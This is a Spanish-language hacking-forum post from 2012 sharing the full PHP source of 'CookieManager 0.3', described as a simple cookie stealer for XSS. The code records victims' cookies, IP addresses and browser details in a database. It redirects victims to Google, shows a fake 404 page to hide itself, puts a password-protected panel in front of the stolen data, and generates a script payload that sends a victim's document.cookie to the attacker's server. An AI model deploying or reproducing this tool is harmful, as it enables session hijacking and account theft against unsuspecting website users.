elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  CookieManager 0.3		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: CookieManager 0.3  (Leído 1,209 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
CookieManager 0.3
« en: 31 Enero 2012, 21:57 pm »
Un simple cookie stealer para XSS.

Código
  1. <?php 
  2.  
  3. //CookieManager 0.3
  4. //Coded By Doddy H
  5.  
  6. //Datos para el login
  7.  
  8. $username = "admin";
  9. $password = "21232f297a57a5a743894a0e4a801fc3"; //admin
  10.  
  11. //
  12.  
  13. //Datos para la DB
  14.  
  15. $host = "localhost";
  16. $userw = "root";
  17. $passw = "";
  18. $db = "cookies";
  19.  
  20. //
  21.  
  22. mysql_connect($host,$userw,$passw);
  24.  
  25. if(isset($_GET['id'])) {
  26.  
  27. if(empty($_GET['id'])) {
  28. error();
  29. }
  30.  
  31. $dia = date("d.m.Y");
  32. $ip = $_SERVER["REMOTE_ADDR"];
  33. $info = $_SERVER["HTTP_USER_AGENT"];
  34. $ref = $_SERVER["HTTP_REFERER"];
  35. $cookie = $_GET['id'];
  36.  
  37. @mysql_query("INSERT INTO todo(id,fecha,ip,info,referer,cookie)values(NULL,'$dia','$ip','$info','$ref','$cookie')");
  38.  
  39. header("Location:http://www.google.com.ar");
  40.  
  41. }
  42.  
  43. elseif (isset($_COOKIE['portal'])) {
  44.  
  45. $st = base64_decode($_COOKIE['portal']);
  46.  
  47. $plit = split("@",$st);
  48. $user = $plit[0];
  49. $pass = $plit[1];	
  50.  
  51.  
  52. if ($user == $username and $pass == $password) {
  53.  
  54. echo "<title>CookieManager 0.3</title>";
  55.  
  56. echo "<STYLE type=text/css>
  57.  
  58. body,a:link {
  59. background-color: #000000;
  60. color:orange;
  61. Courier New;
  62. cursor:crosshair;
  63. font-size: small;
  64. }
  65.  
  66. input,table.outset,table.bord,table,textarea,select,fieldset,td,tr {
  67. font: normal 10px Verdana, Arial, Helvetica,
  68. sans-serif;
  69. background-color:black;
  70. color:orange; 
  71. border: solid 1px orange;
  72. border-color:orange
  73. }
  74.  
  75. a:link,a:visited,a:active {
  76. color: orange;
  77. font: normal 10px Verdana, Arial, Helvetica,
  78. sans-serif;
  79. text-decoration: none;
  80. }
  81.  
  82. </style>
  83. ";
  84.  
  85. if(isset($_POST['instalar'])) {
  86.  
  87. $todo = "create table todo (
  88. id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
  89. fecha TEXT NOT NULL,
  90. ip TEXT NOT NULL,
  91. info TEXT NOT NULL,
  92. referer TEXT NOT NULL,
  93. cookie TEXT NOT NULL,
  94. PRIMARY KEY (id));
  95. ";
  96.  
  97. if (mysql_query($todo)) {
  98. echo "<script>alert('Installed');</script>";
  99. } else {
  100. echo "<script>alert('Error');</script>";
  101. }
  102. }
  103.  
  104. if( mysql_num_rows(mysql_query("show tables like 'todo'"))) {
  105.  
  106. //
  107.  
  108. if(isset($_GET['del'])) {
  109. if (is_numeric($_GET['del'])) {
  110. if (@mysql_query("delete from todo where id='".$_GET['del']."'")) {
  111. echo "<script>alert('Deleted');</script>";
  112. } else {
  113. echo "<script>alert('Error');</script>";
  114. }}}
  115.  
  116. echo "<center>";
  117. echo "<h1>CookieManager</h1><br><br>";
  118.  
  119.  
  120. $iny = htmlentities("<script>document.location='http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']."?id='%2Bdocument.cookie</script>");
  121.  
  122. echo "<b>CODE</b> : <input type=text name=iny value=$iny size=104><br><br>";
  123.  
  124. $re = mysql_query("select * from todo order by id ASC");
  125. $con = mysql_num_rows($re);
  126.  
  127. if ($con==0) {
  128. echo "<script>alert('Not found cookies');</script>";
  129. } else {
  130.  
  131. echo "<br><br><h1>Cookies Found</h1><br><br><table border=1 width=1100>";
  132. echo "<td><b>ID</b></td><td><b>Date</b></td><td><b>IP</b></td><td><b>Data</b></td><td><b>Referer</b></td><td><b>Cookie</b></td><td><b>Option</b></td><tr>";
  133.  
  134. while ($ver = mysql_fetch_array($re)) {
  135.  
  136. echo "<td>".htmlentities($ver[0])."</td><td>".htmlentities($ver[1])."</td><td>".htmlentities($ver[2])."</td><td>".htmlentities($ver[3])."</td>"; 
  137. echo "<td>".htmlentities($ver[4])."</td><td>".htmlentities($ver[5])."</td><td><a href=?del=".$ver[0].">Del</a></td><tr>";
  138.  
  139. }
  140.  
  141. echo "</table>";
  142. echo "<br><br><br><br><br><h1>Coded By Doddy H || 2012</h1><br><br>";
  143.  
  144.  
  145.  
  146.  
  147. }
  148.  
  149. //
  150.  
  151. } else {
  152. echo "
  153. <center><br><br>
  154. <form action='' method=POST>
  155. <h2>Deseas instalar CookieManager ?</h2><br><br>
  156. <input type=submit name=instalar value=Instalar>
  157. </form>";
  158. }
  159. exit(1);
  160. }
  161. }
  162.  
  163. elseif (isset($_POST['login'])) {
  164. if ($_POST['user'] == $username and md5($_POST['password']) == $password) {
  165. setcookie("portal",base64_encode($_POST['user']."@".md5($_POST['password'])));	
  166. echo "<script>alert('Welcome idiot');</script>";
  167. echo '<meta http-equiv="refresh" content=0;URL=>';
  168. } else {
  169. echo "<script>alert('Continued to participate');</script>";
  170. }
  171. }
  172.  
  173. elseif(isset($_GET['adminow'])) {
  174.  
  175. echo "
  176. <h1><center>Login</center></h1>
  177. <br><br><center>
  178. <form action='' method=POST>
  179. Username : <input type=text name=user><br>
  180. Password : <input type=text name=password><br><br>
  181. <input type=submit name=login value=Enter><br>
  182. </form>
  183. </center><br><br>";
  184. } else {
  185.  
  186. error();
  187.  
  188. }
  189.  
  190. function error() {
  191. echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  192. <html><head>
  193. <title>404 Not Found</title>
  194. </head><body>
  195. <h1>Not Found</h1>
  196. <p>The requested URL was not found on this server.</p>
  197. </body></html>';
  198. exit(1);
  199. }
  200.  
  201.  
  203.  
  204. // The End ?
  205.  
  206.  
  207. ?> 
  208.  
  209.  
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[PHP] CookieManager 0.5
PHP 		BigBear 6 2,256 Último mensaje 12 Febrero 2015, 18:45 pm
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines